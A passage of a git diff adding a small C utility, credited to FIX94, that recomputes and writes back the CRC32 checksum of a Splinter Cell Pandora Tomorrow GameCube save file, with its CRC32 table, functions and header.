0xcabac28a, 0x53b39330, 0x24b4a3a6, 0xbad03605, 0xcdd70693, + 0x54de5729, 0x23d967bf, 0xb3667a2e, 0xc4614ab8, 0x5d681b02, 0x2a6f2b94, + 0xb40bbe37, 0xc30c8ea1, 0x5a05df1b, 0x2d02ef8d +}; + +unsigned int crc32buffer(const unsigned char *buffer, const unsigned int len, unsigned int oldcrc32) +{ + unsigned int i; + for(i = 0; i < len; i++) + oldcrc32 = UPDC32(buffer[i], oldcrc32); + return oldcrc32; +} + +unsigned int crc32simple(void *buf, unsigned int size) +{ + unsigned int oldcrc32 = 0xFFFFFFFF; + oldcrc32 = crc32buffer(buf, size, oldcrc32); + return oldcrc32 = ~oldcrc32; +} diff --git a/pandoratomorrow_crc/crc32.h b/pandoratomorrow_crc/crc32.h new file mode 100644 index 0000000..e412739 --- /dev/null +++ b/pandoratomorrow_crc/crc32.h @@ -0,0 +1,10 @@ + +#ifndef CRC32_H +#define CRC32_H + +#define UPDC32(octet, crc) (crc_32_tab[((crc)\ + ^ (octet)) & 0xff] ^ ((crc) >> 8)) + +unsigned int crc32simple(void *buf, unsigned int size); + +#endif /* CRC32_H */ diff --git a/pandoratomorrow_crc/main.c b/pandoratomorrow_crc/main.c new file mode 100644 index 0000000..94c39fb --- /dev/null +++ b/pandoratomorrow_crc/main.c @@ -0,0 +1,35 @@ +// Copyright 2018 FIX94 +// This code is licensed to you under the terms of the GNU GPL, version 2; +// see file LICENSE or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt + +#include +#include +#include "crc32.h" + +int main(int argc, char *argv[]) +{ + if(argc != 2) return 0; + FILE *f = fopen(argv[1],"rb"); + fseek(f,0,SEEK_END); + size_t fsize = ftell(f); + if(fsize != 0xA040) + { + puts("No pandora tomorrow gci!"); + fclose(f); + return 0; + } + rewind(f); + unsigned char *buf = malloc(fsize); + fread(buf,fsize,1,f); + fclose(f); + + unsigned int crc = crc32simple(buf+0x40,0x9FFC); + crc = __builtin_bswap32(crc); + memcpy(buf+0xA03C, &crc, 4); + + f = fopen(argv[1],"wb"); + fwrite(buf,0xA040,1,f); + fclose(f); + free(buf); + return 0; +} \ No newline at end of file